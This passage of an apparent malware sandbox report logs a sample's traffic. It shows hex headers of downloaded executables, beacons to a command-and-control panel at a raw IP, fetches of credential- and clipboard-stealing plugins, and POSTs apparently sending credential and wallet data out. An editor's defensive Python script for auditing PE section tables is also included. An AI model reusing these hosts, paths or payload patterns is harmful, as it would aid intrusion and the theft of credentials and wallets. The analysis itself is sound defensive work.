58 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 4a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 4a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 76 6e 65 79 71 71 00 70 19 00 00 90 3f 00 00 6c 19 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 78 63 77 7a 66 70 63 00 10 00 00 00 00 59 00 00 04 00 00 00 3e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:04 GMTContent-Type: application/octet-streamContent-Length: 97792Last-Modified: Fri, 19 Apr 2024 00:20:52 GMTConnection: keep-aliveETag: "6621b8e4-17e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 4e 93 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 93 01 00 4b 00 00 00 00 a0 01 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 73 01 00 00 20 00 00 00 74 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 de 04 00 00 00 a0 01 00 00 06 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 93 01 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 af 00 00 4c e3 00 00 03 00 00 00 43 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 09 00 20 03 00 00 01 00 00 11 73 01 00 00 0a 0a 02 7e 03 00 00 04 25 2d 17 26 7e 02 00 00 04 fe 06 10 00 00 06 73 02 00 00 0a 25 80 03 00 00 04 28 01 00 00 2b 6f 04 00 00 0a 0b 38 cc 02 00 00 07 6f 05 00 00 0a 17 17 19 8d 08 00 00 01 25 16 1f 0a 8d 09 00 00 01 25 d0 0a 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 17 1e 8d 09 00 00 01 25 d0 02 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 25 18 1d 8d 09 00 00 01 25 d0 07 01 00 04 28 06 00 00 0a 73 07 00 00 0a a2 28 01 01 00 06 6f 08 00 00 0a 0c 38 46 02 00 00 12 02 28 09 00 00 0a 0d 73 09 00 00 06 13 04 73 2c 01 00 06 13 05 11 04 7e 0a 00 00 0a 7d 01 00 00 04 7e 0a 00 00 0a 13 06 11 04 09 73 0b 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 7d 01 00 00 04 11 04 7b 01 00 00 04 1f 0f 8d 09 00 00 01 25 d0 12 01 00 04 28 06 00 00 0a 73 07 00 00 0a 6f 0e 00 00 0a 2c 1a 1e 8d 09 00 00 01 25 d0 fd 00 00 04 28 06 00 00 0a 73 07 00 00 0a 13 06 2b 4f 09 1f 3e 8d 09 00 00 01 25 d0 ca 00 00 04 28 06 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 19 Apr 2024 01:30:07 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 
61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
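The dumps above are the first kilobyte of each payload the sample pulled down, and several of them show the section-table traits the report's signatures name: section names padded with spaces or made of eight random letters (".idata  ", a blank name, "fbupybke", "ejxqaids"), sections mapped read-write-execute, and huge virtual sizes backed by a few hundred raw bytes. The following is an added example written for this page, not tooling from the report or from the sandbox vendor: it walks a PE section table and reports those traits. The allow-list of linker section names is the editor's heuristic (a name such as ".taggant" from the dump is therefore reported as unknown, which is what a triage pass wants), and build_sample_pe() constructs a headers-only PE32 whose four section entries approximate the values in the first dump.

```python
"""Audit a PE section table for the traits the report flags above: section
names made of spaces or random letters, RWX sections, and sections whose raw
size is far below their mapped size. Added example by the editor, not report
tooling; build_sample_pe() constructs a headers-only PE32 whose section
entries approximate the first dump above."""
import re
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names a linker normally emits; anything else is reported (heuristic allow-list).
KNOWN_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
               ".edata", ".pdata", ".bss", ".tls", ".CRT", "_RDATA"}
WELL_FORMED = re.compile(rb"^[.A-Za-z_][A-Za-z0-9_.]*$")


def section_table(pe):
    """Yield (name, virtual_size, virtual_address, raw_size, raw_ptr, flags)."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    first = coff + 20 + opt_size            # section headers follow the optional header
    for i in range(nsections):
        off = first + i * 40
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<IIIIIIHHI", pe, off + 8)
        yield name, vsize, vaddr, rsize, rptr, flags


def audit_sections(pe):
    """Return [(name, [issue, ...]), ...] in section order."""
    findings = []
    for name, vsize, _vaddr, rsize, _rptr, flags in section_table(pe):
        issues = []
        if not WELL_FORMED.match(name):
            issues.append("odd-name")        # spaces, empty or non-ASCII bytes
        elif name.decode() not in KNOWN_NAMES:
            issues.append("unknown-name")    # e.g. random 8-letter packer names
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            issues.append("rwx")
        if rsize < vsize // 4:
            issues.append("sparse-raw")      # mostly filled at run time (unpacking)
        findings.append((name.decode("latin-1"), issues))
    return findings


def build_sample_pe():
    """Constructed headers-only PE32; section values approximate the first dump."""
    def sec(name, vsize, vaddr, rsize, rptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, flags)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    sections = [
        sec(b".text", 0x12336, 0x1000, 0x12400, 0x400, 0x60000020),        # code, R+X
        sec(b".idata  ", 0x1000, 0x67000, 0x200, 0x2e800, 0xc0000040),     # trailing spaces
        sec(b" " * 8, 0x2ac000, 0x68000, 0x200, 0x2ea00, 0xe0000040),      # blank name, RWX
        sec(b"fbupybke", 0x1a0000, 0x314000, 0x19fe, 0x2ec00, 0xe0000040), # random name, RWX
    ]
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)              # PE32 magic only
    return dos + b"PE\0\0" + coff + optional + b"".join(sections)


if __name__ == "__main__":
    for name, issues in audit_sections(build_sample_pe()):
        print(f"{name!r:12} {', '.join(issues) or 'ok'}")
```

Because only the headers are read, `bytes.fromhex()` applied to the Data Raw hex of one of the dumps above gives a usable input to audit_sections() whenever the dump extends through the section table; the "sparse-raw" rule is a ratio heuristic and will also fire on a legitimately large .bss-style data section, so treat it as a triage hint rather than a verdict.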
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1713490393138Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYyMQ==Host: 193.233.132.56Content-Length: 4781Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000057031&unit=246122658369
Source: global traffic HTTP traffic detected: the two-request pair above (POST /Pneh2sXQk0/index.php with Content-Length: 4 and Data Ascii: st=s, followed by POST /Pneh2sXQk0/index.php with Content-Length: 156 and Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332, both to Host: 193.233.132.56) is repeated 10 further times with identical headers and bodies
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
